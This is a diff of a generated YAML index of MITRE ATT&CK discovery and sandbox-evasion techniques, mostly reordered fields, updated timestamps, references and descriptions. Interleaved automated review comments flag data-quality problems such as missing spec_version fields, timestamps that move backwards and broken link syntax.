- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1087/003
+ external_id: T1087.003
+ - source_name: Black Hills Attacking Exchange MailSniper, 2016
+ description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+ Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+ - source_name: Google Workspace Global Access List
+ description: Google. (n.d.). Retrieved March 16, 2021.
+ url: https://support.google.com/a/answer/166870?hl=en
+ - source_name: Microsoft Exchange Address Lists
+ description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+ Retrieved March 26, 2020.
+ url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+ - source_name: Microsoft getglobaladdresslist
+ description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+ 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1497.003:
+ technique:
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
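Review bot: the T1087.003 platform list shrinks to Windows and Office Suite while the description immediately above still names Google Workspace (the GAL shared through GWSMO, the Workspace Directory); if Office Suite is the new umbrella that subsumes Office 365 and Google Workspace, as the T1087 platform change further down suggests, that is fine, but it deserves a line in the commit message. Separately, this entry still ends with atomic_tests: [] and no identifier: T1087.003 line, whereas the neighbouring T1010 and T1497.003 entries carry identifier lines; that was already the case before this change, but a regeneration is the moment to make the entries uniform. The 'theGet-GlobalAddressList' to 'the Get-GlobalAddressList' correction in the description is right.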
@@ -49569,6 +50217,12 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -49578,9 +50232,14 @@ discovery:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -49590,102 +50249,137 @@ discovery:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests: []
T1580:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Cloud Infrastructure Discovery
+ description: |-
+ An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+ Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+ An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Regina Elwell
- Praetorian
- Isif Ibrahima, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+ components. Monitor logs for actions that could be taken to gather information
+ about cloud infrastructure, including the use of discovery API calls by new
+ or unexpected users and enumerations from unknown or malicious IP addresses.
+ To reduce false positives, valid change management procedures could introduce
+ a known identifier that is logged with the change (e.g., tag or header) if
+ supported by the cloud provider, to help distinguish valid, expected actions
+ from malicious ones.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Instance: Instance Enumeration'
+ - 'Cloud Storage: Cloud Storage Enumeration'
+ - 'Volume: Volume Enumeration'
+ - 'Snapshot: Snapshot Enumeration'
type: attack-pattern
id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
created: '2020-08-20T17:51:25.671Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1580
url: https://attack.mitre.org/techniques/T1580
+ external_id: T1580
- source_name: Expel IO Evil in AWS
- url: https://expel.io/blog/finding-evil-in-aws/
description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
Evil in AWS. Retrieved June 25, 2020.
+ url: https://expel.io/blog/finding-evil-in-aws/
- source_name: AWS Head Bucket
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
14, 2022.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
- source_name: AWS Get Public Access Block
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
- source_name: AWS Describe DB Instances
- url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
- source_name: Amazon Describe Instance
- url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
description: Amazon. (n.d.). describe-instance-information. Retrieved March
3, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
- source_name: Amazon Describe Instances API
- url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
- source_name: Google Compute Instances
- url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
description: Google. (n.d.). gcloud compute instances list. Retrieved May
26, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
- source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
- source_name: Microsoft AZ CLI
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
- url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
- Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
- An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Infrastructure Discovery
- x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
- components. Monitor logs for actions that could be taken to gather information
- about cloud infrastructure, including the use of discovery API calls by new
- or unexpected users and enumerations from unknown or malicious IP addresses.
- To reduce false positives, valid change management procedures could introduce
- a known identifier that is logged with the change (e.g., tag or header) if
- supported by the cloud provider, to help distinguish valid, expected actions
- from malicious ones.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Instance: Instance Enumeration'
- - 'Cloud Storage: Cloud Storage Enumeration'
- - 'Volume: Volume Enumeration'
- - 'Snapshot: Snapshot Enumeration'
- x_mitre_attack_spec_version: 2.1.0
+ url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1580
atomic_tests: []
T1217:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-16T14:24:40.625Z'
name: Browser Bookmark Discovery
description: |-
Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
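Review bot: the T1580 description brought in on the '+' lines keeps two upstream text defects: 'Persistence.(Citation: Mandiant M-Trends 2020)An adversary' lacks a space after the citation, and 'Adversaries have also may use infrastructure discovery APIs' is ungrammatical (read 'Adversaries may also use'); since this file is generated from the ATT&CK bundle they belong upstream, not in a hand edit here, but they should not later be mistaken for local regressions. In the same entry the 'Microsoft AZ CLI' reference describes 'az ad user' and links the ad/user page while the description cites it for 'az vm list', again an upstream mismatch. The line breaks inside the description fall exactly around the API names (DescribeInstances, ListBuckets, HeadBucket, GetPublicAccessBlock, gcloud compute instances list, az vm list), which suggests inline code markup was stripped on import; confirm the rendered text is still legible. Finally, the Deloitte Environment Awareness URL gains an '/edit' suffix together with a new retrieved date (here and again for T1497 at the end of the diff); check that the edit-view link resolves for an unauthenticated reader, since the bare file URL it replaces was the public form.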
@@ -49739,7 +50433,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1217
atomic_tests: []
T1016:
@@ -49769,7 +50462,7 @@ discovery:
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
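Review bot: the replacement detection text introduces unbalanced braces: '{{LinkById|T1059.008}' opens with two and closes with one, and neither this form nor the old '(LinkById: T1059.008)' renders as a link for a consumer of this YAML, unlike the markdown links used later on the same line for T1047 and T1059/001. If the text is verbatim from upstream ATT&CK it should be reported there; the consistent local form would be a markdown link of the same shape, [...](https://attack.mitre.org/techniques/T1059/008), with the sub-technique name taken from the bundle.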
@@ -49807,12 +50500,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016
atomic_tests: []
T1087:
technique:
- modified: '2024-01-12T23:36:56.245Z'
+ modified: '2024-10-15T15:35:28.784Z'
name: Account Discovery
description: |-
Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -49839,14 +50531,13 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
@@ -49875,7 +50566,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1482:
technique:
@@ -49935,7 +50625,7 @@ discovery:
.NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
[Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T19:18:22.305Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Domain Trust Discovery
x_mitre_detection: |
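Review bot: the modified timestamp for T1482 moves backward here, from '2022-11-08T14:00:00.188Z' to '2022-06-16T19:18:22.305Z', and the same regression appears for T1217 ('2023-05-09' to '2023-04-16') and T1049 ('2022-11-08' to '2022-09-06') elsewhere in this diff, while those three entries also keep x_mitre_attack_spec_version 2.1.0 or 3.1.0 where the surrounding techniques were bumped to 3.2.0. A modified date that goes backwards usually means the regenerating run read a different, older or differently exported STIX source for these objects; confirm that no later upstream edits to them were lost before merging.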
@@ -49954,7 +50644,6 @@ discovery:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1482
atomic_tests: []
T1083:
@@ -50023,12 +50712,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1083
atomic_tests: []
T1049:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-09-06T22:35:34.231Z'
name: System Network Connections Discovery
description: "Adversaries may attempt to get a listing of network connections
to or from the compromised system they are currently accessing or from remote
@@ -50105,40 +50793,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1049
atomic_tests: []
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -50150,6 +50809,10 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -50160,8 +50823,14 @@ discovery:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -50171,9 +50840,28 @@ discovery:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1619:
technique:
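Review bot: `- spec_version: '2.1'` is removed here for T1497 and the same removal repeats for every technique object further down (T1619, T1654, T1057, T1069.001, T1201, T1614.001, T1012, T1614, T1518.001, T1526, T1018). `spec_version` is a required common property on every STIX 2.1 object, so anything that validates or re-exports these `technique:` blocks as STIX will now reject them; if the field is dropped on purpose because the index is no longer meant to be STIX-shaped, state that, otherwise keep emitting it alongside the new `x_mitre_attack_spec_version: 3.2.0`. Secondary: the Deloitte reference changes from the bare Google Drive file-ID URL to the same URL with an `/edit` suffix; read-only Drive share links are normally the `/view` form, so confirm the new link resolves for an unauthenticated reader before it replaces one that worked.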
@@ -50206,7 +50894,7 @@ discovery:
Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-11T22:29:43.677Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Cloud Storage Object Discovery
x_mitre_detection: "System and network discovery techniques normally occur throughout
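Review bot: `modified` for T1619 moves backwards, from `'2022-05-11T14:00:00.188Z'` to `'2022-04-11T22:29:43.677Z'`, and the same happens further down for T1069.001, T1614.001 and T1012. The removed values all share the `14:00:00.188Z` time of day, which looks like a release-date stamp applied by the previous generator, while the added values are the objects' own upstream timestamps. Any consumer that treats `modified` as monotonic to decide what changed since its last sync will skip these objects, so call out the source switch in the commit message and, if a sync tool depends on it, compare on content rather than on `modified`.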
@@ -50224,12 +50912,11 @@ discovery:
- 'Cloud Storage: Cloud Storage Enumeration'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1619
atomic_tests: []
T1654:
technique:
- modified: '2023-09-30T22:18:46.711Z'
+ modified: '2024-10-15T12:24:40.892Z'
name: Log Enumeration
description: |-
Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -50237,11 +50924,14 @@ discovery:
Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+ In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
x_mitre_contributors:
- Bilal Bahadır Yenici
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
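Review bot: the added paragraph `In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures` gives T1654 a second behaviour, but `x_mitre_detection: ''` two lines below stays empty, so the entry now describes an adversary watching the SIEM for responder activity and offers defenders nothing to look for (unusual query volume or log-export actions by an unexpected principal would be the obvious candidates). That is upstream ATT&CK text rather than something to patch in this regenerated file, but it is worth raising upstream and worth remembering wherever this index feeds a detection-coverage map, since the new `(Citation: Permiso GUI-Vil 2023)` is the only pointer a reader gets.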
@@ -50252,7 +50942,7 @@ discovery:
- macOS
- Windows
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
